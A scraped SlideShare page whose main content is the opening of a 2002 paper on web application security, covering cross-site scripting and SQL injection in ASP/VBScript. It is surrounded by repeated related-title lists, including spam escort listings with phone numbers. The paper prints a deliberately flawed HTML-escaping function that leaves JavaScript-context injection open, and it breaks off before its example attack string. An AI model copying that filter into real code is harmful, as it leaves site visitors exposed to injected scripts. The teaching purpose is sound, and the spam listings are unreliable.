Coding Ajax
Coding AjaxCoding Ajax
Coding Ajax
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Linux version of PVS-Studio couldn't help checking CodeLite
Linux version of PVS-Studio couldn't help checking CodeLiteLinux version of PVS-Studio couldn't help checking CodeLite
Linux version of PVS-Studio couldn't help checking CodeLite
 

Viewers also liked

Our lady ransom prospectus
Our lady ransom prospectusOur lady ransom prospectus
Our lady ransom prospectusolorhead
 
DS Technicolor DWG850-4B
DS Technicolor DWG850-4BDS Technicolor DWG850-4B
DS Technicolor DWG850-4BChris x-MS
 
'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...
'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...
'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...Mark Breen
 
ECS P35T-A (1.0b)
ECS P35T-A (1.0b)ECS P35T-A (1.0b)
ECS P35T-A (1.0b)Chris x-MS
 
Real howto vbs
Real howto vbsReal howto vbs
Real howto vbsChris x-MS
 
Microsoft OCSP LUNA SA PCI Integration Guide
Microsoft OCSP LUNA SA PCI Integration GuideMicrosoft OCSP LUNA SA PCI Integration Guide
Microsoft OCSP LUNA SA PCI Integration GuideChris x-MS
 
3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTEN
3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTEN3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTEN
3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTENAndrew Garberson
 
Virtual PC 2007
Virtual PC 2007Virtual PC 2007
Virtual PC 2007Chris x-MS
 
Les établissements publics fonciers locaux unis pour défendre leur action
Les établissements publics fonciers locaux unis pour défendre leur action Les établissements publics fonciers locaux unis pour défendre leur action
Les établissements publics fonciers locaux unis pour défendre leur action Département Loire-Atlantique
 
Budget 2013 du Conseil général - Décisition Modificative n°2
Budget 2013 du Conseil général - Décisition Modificative n°2Budget 2013 du Conseil général - Décisition Modificative n°2
Budget 2013 du Conseil général - Décisition Modificative n°2Département Loire-Atlantique
 
17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...
17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...
17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...Département Loire-Atlantique
 
SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...
SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...
SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...Longitude 64 Switzerland
 
HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...
HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...
HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...Longitude 64 Switzerland
 
BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...
BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...
BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...Longitude 64 Switzerland
 
Le Département déploie l'internet à haut débit pour tous
Le Département déploie l'internet à haut débit pour tous Le Département déploie l'internet à haut débit pour tous
Le Département déploie l'internet à haut débit pour tous Département Loire-Atlantique
 
Le Département, engagé dans le tourisme durable : le passeport vert
Le Département, engagé dans le tourisme durable : le passeport vertLe Département, engagé dans le tourisme durable : le passeport vert
Le Département, engagé dans le tourisme durable : le passeport vertDépartement Loire-Atlantique
 

Viewers also liked (19)

Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
Our lady ransom prospectus
Our lady ransom prospectusOur lady ransom prospectus
Our lady ransom prospectus
 
DS Technicolor DWG850-4B
DS Technicolor DWG850-4BDS Technicolor DWG850-4B
DS Technicolor DWG850-4B
 
'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...
'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...
'Entrepreneurship - Defining The Key To Success' by Mark Breen (Cuckoo Events...
 
ECS P35T-A (1.0b)
ECS P35T-A (1.0b)ECS P35T-A (1.0b)
ECS P35T-A (1.0b)
 
Real howto vbs
Real howto vbsReal howto vbs
Real howto vbs
 
Microsoft OCSP LUNA SA PCI Integration Guide
Microsoft OCSP LUNA SA PCI Integration GuideMicrosoft OCSP LUNA SA PCI Integration Guide
Microsoft OCSP LUNA SA PCI Integration Guide
 
3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTEN
3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTEN3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTEN
3 SEO Crimes that Every Nonprofit Organization Commits - #14NTC from NTEN
 
Virtual PC 2007
Virtual PC 2007Virtual PC 2007
Virtual PC 2007
 
ASUS K8V-X SE
ASUS K8V-X SEASUS K8V-X SE
ASUS K8V-X SE
 
Agir Handi solidaire avec Damien Seguin
Agir Handi solidaire avec Damien SeguinAgir Handi solidaire avec Damien Seguin
Agir Handi solidaire avec Damien Seguin
 
Les établissements publics fonciers locaux unis pour défendre leur action
Les établissements publics fonciers locaux unis pour défendre leur action Les établissements publics fonciers locaux unis pour défendre leur action
Les établissements publics fonciers locaux unis pour défendre leur action
 
Budget 2013 du Conseil général - Décisition Modificative n°2
Budget 2013 du Conseil général - Décisition Modificative n°2Budget 2013 du Conseil général - Décisition Modificative n°2
Budget 2013 du Conseil général - Décisition Modificative n°2
 
17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...
17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...
17 000 ha d’espaces agricoles et naturels bientôt protégés entre l’agglomérat...
 
SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...
SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...
SEA RAY SEA RAY 340 SUNDANCER , 1987, 39.200 € For Sale Yacht Brochure. Prese...
 
HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...
HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...
HUNTER MARINE HUNTER 31, 2006, 64.900 € For Sale Yacht Brochure. Presented By...
 
BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...
BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...
BENETEAU OCEANIS 350, 1990, 47.000 € For Sale Yacht Brochure. Presented By lo...
 
Le Département déploie l'internet à haut débit pour tous
Le Département déploie l'internet à haut débit pour tous Le Département déploie l'internet à haut débit pour tous
Le Département déploie l'internet à haut débit pour tous
 
Le Département, engagé dans le tourisme durable : le passeport vert
Le Département, engagé dans le tourisme durable : le passeport vertLe Département, engagé dans le tourisme durable : le passeport vert
Le Département, engagé dans le tourisme durable : le passeport vert
 

Similar to Web Application Security

XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hoursnoopythesecuritydog
 
Consequences of using the Copy-Paste method in C++ programming and how to dea...
Consequences of using the Copy-Paste method in C++ programming and how to dea...Consequences of using the Copy-Paste method in C++ programming and how to dea...
Consequences of using the Copy-Paste method in C++ programming and how to dea...Andrey Karpov
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Giorgio Fedon
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs ChromiumAndrey Karpov
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cristian Alexandrescu
 
ASP.NET 05 - Exception Handling And Validation Controls
ASP.NET 05 - Exception Handling And Validation ControlsASP.NET 05 - Exception Handling And Validation Controls
ASP.NET 05 - Exception Handling And Validation ControlsRandy Connolly
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projectsPVS-Studio
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
PVS-Studio: analyzing ReactOS's code
PVS-Studio: analyzing ReactOS's codePVS-Studio: analyzing ReactOS's code
PVS-Studio: analyzing ReactOS's codePVS-Studio
 
Java script basics
Java script basicsJava script basics
Java script basicsJohn Smith
 
Javascript part1
Javascript part1Javascript part1
Javascript part1Raghu nath
 
Intro to mobile web application development
Intro to mobile web application developmentIntro to mobile web application development
Intro to mobile web application developmentzonathen
 
Ajax Performance
Ajax PerformanceAjax Performance
Ajax Performancekaven yan
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio
 

Similar to Web Application Security (20)

XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
 
Consequences of using the Copy-Paste method in C++ programming and how to dea...
Consequences of using the Copy-Paste method in C++ programming and how to dea...Consequences of using the Copy-Paste method in C++ programming and how to dea...
Consequences of using the Copy-Paste method in C++ programming and how to dea...
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs Chromium
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs Chromium
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
 
ASP.NET 05 - Exception Handling And Validation Controls
ASP.NET 05 - Exception Handling And Validation ControlsASP.NET 05 - Exception Handling And Validation Controls
ASP.NET 05 - Exception Handling And Validation Controls
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Java script
Java scriptJava script
Java script
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
PVS-Studio: analyzing ReactOS's code
PVS-Studio: analyzing ReactOS's codePVS-Studio: analyzing ReactOS's code
PVS-Studio: analyzing ReactOS's code
 
Asp
AspAsp
Asp
 
Java scipt
Java sciptJava scipt
Java scipt
 
Java script basics
Java script basicsJava script basics
Java script basics
 
CSC PPT 12.pptx
CSC PPT 12.pptxCSC PPT 12.pptx
CSC PPT 12.pptx
 
Javascript part1
Javascript part1Javascript part1
Javascript part1
 
Intro to mobile web application development
Intro to mobile web application developmentIntro to mobile web application development
Intro to mobile web application development
 
Ajax Performance
Ajax PerformanceAjax Performance
Ajax Performance
 
Migration from ASP to ASP.NET
Migration from ASP to ASP.NETMigration from ASP to ASP.NET
Migration from ASP to ASP.NET
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs Chromium
 

More from Chris x-MS

Escolhendo Pneus de carros
Escolhendo Pneus de carrosEscolhendo Pneus de carros
Escolhendo Pneus de carrosChris x-MS
 
Cerveja vs Perereca
Cerveja vs PererecaCerveja vs Perereca
Cerveja vs PererecaChris x-MS
 
Reportagem Filha - 2008 - Sobre Telescópio James Webb
Reportagem Filha - 2008 - Sobre Telescópio James WebbReportagem Filha - 2008 - Sobre Telescópio James Webb
Reportagem Filha - 2008 - Sobre Telescópio James WebbChris x-MS
 
Chiclete pode engolir
Chiclete pode engolirChiclete pode engolir
Chiclete pode engolirChris x-MS
 
Samsung HD P-ATA Jumper Limit
Samsung HD P-ATA Jumper LimitSamsung HD P-ATA Jumper Limit
Samsung HD P-ATA Jumper LimitChris x-MS
 
802.11 Protocol Map
802.11 Protocol Map802.11 Protocol Map
802.11 Protocol MapChris x-MS
 
RTS Thresould - Netgear explain
RTS Thresould - Netgear explainRTS Thresould - Netgear explain
RTS Thresould - Netgear explainChris x-MS
 
D-LINK DSL-502 G
D-LINK DSL-502 GD-LINK DSL-502 G
D-LINK DSL-502 GChris x-MS
 
Contrato Microsoft Serviços Live
Contrato Microsoft Serviços LiveContrato Microsoft Serviços Live
Contrato Microsoft Serviços LiveChris x-MS
 
Solucionando problemas de acesso sem fio do windows xp - 802.11
Solucionando problemas de acesso sem fio do windows xp - 802.11Solucionando problemas de acesso sem fio do windows xp - 802.11
Solucionando problemas de acesso sem fio do windows xp - 802.11Chris x-MS
 
Tutorial sobre protocolo TCP/IP
Tutorial sobre protocolo TCP/IPTutorial sobre protocolo TCP/IP
Tutorial sobre protocolo TCP/IPChris x-MS
 
Discos de Estado Sólido III
Discos de Estado Sólido IIIDiscos de Estado Sólido III
Discos de Estado Sólido IIIChris x-MS
 
HD (Hard Disk) ou Discos Rigidos - Como funcionam?!
HD (Hard Disk) ou Discos Rigidos - Como funcionam?!HD (Hard Disk) ou Discos Rigidos - Como funcionam?!
HD (Hard Disk) ou Discos Rigidos - Como funcionam?!Chris x-MS
 
Aula de C para Linux
Aula de C para LinuxAula de C para Linux
Aula de C para LinuxChris x-MS
 
64 bits para o Povo
64 bits para o Povo64 bits para o Povo
64 bits para o PovoChris x-MS
 
Formula do Habibs
Formula do HabibsFormula do Habibs
Formula do HabibsChris x-MS
 
A Questão da Pena de Morte
A Questão da Pena de MorteA Questão da Pena de Morte
A Questão da Pena de MorteChris x-MS
 

More from Chris x-MS (20)

Escolhendo Pneus de carros
Escolhendo Pneus de carrosEscolhendo Pneus de carros
Escolhendo Pneus de carros
 
Cerveja vs Perereca
Cerveja vs PererecaCerveja vs Perereca
Cerveja vs Perereca
 
Reportagem Filha - 2008 - Sobre Telescópio James Webb
Reportagem Filha - 2008 - Sobre Telescópio James WebbReportagem Filha - 2008 - Sobre Telescópio James Webb
Reportagem Filha - 2008 - Sobre Telescópio James Webb
 
Chiclete pode engolir
Chiclete pode engolirChiclete pode engolir
Chiclete pode engolir
 
GN 8050 TCA
GN 8050 TCAGN 8050 TCA
GN 8050 TCA
 
Samsung HD P-ATA Jumper Limit
Samsung HD P-ATA Jumper LimitSamsung HD P-ATA Jumper Limit
Samsung HD P-ATA Jumper Limit
 
802.11 Protocol Map
802.11 Protocol Map802.11 Protocol Map
802.11 Protocol Map
 
RTS Thresould - Netgear explain
RTS Thresould - Netgear explainRTS Thresould - Netgear explain
RTS Thresould - Netgear explain
 
ASUS P4V8X-X
ASUS P4V8X-XASUS P4V8X-X
ASUS P4V8X-X
 
D-LINK DSL-502 G
D-LINK DSL-502 GD-LINK DSL-502 G
D-LINK DSL-502 G
 
Contrato Microsoft Serviços Live
Contrato Microsoft Serviços LiveContrato Microsoft Serviços Live
Contrato Microsoft Serviços Live
 
Solucionando problemas de acesso sem fio do windows xp - 802.11
Solucionando problemas de acesso sem fio do windows xp - 802.11Solucionando problemas de acesso sem fio do windows xp - 802.11
Solucionando problemas de acesso sem fio do windows xp - 802.11
 
Tutorial sobre protocolo TCP/IP
Tutorial sobre protocolo TCP/IPTutorial sobre protocolo TCP/IP
Tutorial sobre protocolo TCP/IP
 
Discos de Estado Sólido III
Discos de Estado Sólido IIIDiscos de Estado Sólido III
Discos de Estado Sólido III
 
HD (Hard Disk) ou Discos Rigidos - Como funcionam?!
HD (Hard Disk) ou Discos Rigidos - Como funcionam?!HD (Hard Disk) ou Discos Rigidos - Como funcionam?!
HD (Hard Disk) ou Discos Rigidos - Como funcionam?!
 
Aula de C para Linux
Aula de C para LinuxAula de C para Linux
Aula de C para Linux
 
64 bits para o Povo
64 bits para o Povo64 bits para o Povo
64 bits para o Povo
 
Formula do Habibs
Formula do HabibsFormula do Habibs
Formula do Habibs
 
A Questão da Pena de Morte
A Questão da Pena de MorteA Questão da Pena de Morte
A Questão da Pena de Morte
 
O que é SPAM
O que é SPAMO que é SPAM
O que é SPAM
 

Recently uploaded

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 

Recently uploaded (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 

Web Application Security

  • 1. Web Application Security namics ag Patrice Neff July 17, 2002 Abstract Bugtraq is floated with Web bugs, especially cross-site scripting (XSS) and SQL injection problems. A while ago a friend mailed me a link at sunrise.net, revealing the SQL Server version. Theoretically many ASP programmers know, that input validation is re- quired. With this paper I want to show you exactly why this should be done and give you some tools to ease this effort. The code samples are all written for VBScript. This document only covers the security threats that Web developers can fix. 1
  • 2. Contents 1 Cross-Site Scripting 3 1.1 Protection: Approach I Filter HTML Characters . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.2 Protection: Approach II Only Allow a Limited Character Set . . . . . . . . . . . . . . . . . . . . 4 1.3 Protection: Approach III Safely Allow Some Tags . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.4 Common Pitfalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2 SQL Injection 6 2.1 Protection: Approach I Filter characters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 2.2 Protection: Approach II ADODB Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3 Attack Demonstration 7 3.0.1 Set up/look for a page to log cookies . . . . . . . . . . . . . . 7 3.0.2 Create a JavaScript . . . . . . . . . . . . . . . . . . . . . . . 7 3.0.3 Inject the script . . . . . . . . . . . . . . . . . . . . . . . . . 8 3.0.4 Break the session . . . . . . . . . . . . . . . . . . . . . . . . . 8 4 Solutions 8 4.1 Some Ideas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.2 ASP Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.3 Checker Tool . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.3.1 Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 4.4 Configuration Changes . . . . . . . . . . . . . . . . . . . . . . . . . . 9 A ASP Functions Code 9 B Regular Expressions 11 C Checker Tool Code 11 D Example for ADODB.Command 13 References 14 2
  • 3. 1 Cross-Site Scripting Cross-site scripting (XSS) is a threat where the attacker can inject code into a Web application which gets executed at the visitor’s site. This is possible whenever the input of the user gets displayed on the Web site again, for example in guest books. This attack form can be used to exploit browser bugs like buffer overflows and ActiveX flaws or to steal cookies (see section 3). 1.1 Protection: Approach I Filter HTML Characters The simplest approach to disable cross-site scripting is the filtering of HTML char- acters. > → &gt; < → &lt; ” → &quot; & → &amp; If you put this sanitized code in an HTML environment it should keep you save from cross-site scripting bugs. But imagine this code: <% Function cHtml(str) s = str s = Replace(s, "&", "&amp;") s = Replace(s, ">", "&qt;") s = Replace(s, "<", "&lt;") s = Replace(s, """", "&quot;") cHtml = s End Function str = cHtml(Request("str")) %> <html> <head> <title>custom JavaScript</title> <script language="JavaScript"> function cmsg() { alert(’custom message: <%=str%>’); } </script> </head> <body onload="cmsg()"> This displays a custom message on page load. </body> </html> This allows a lot of query strings that don’t include any “forbidden charac- ters”. For example this query string would redirect every visitor to my Web site: 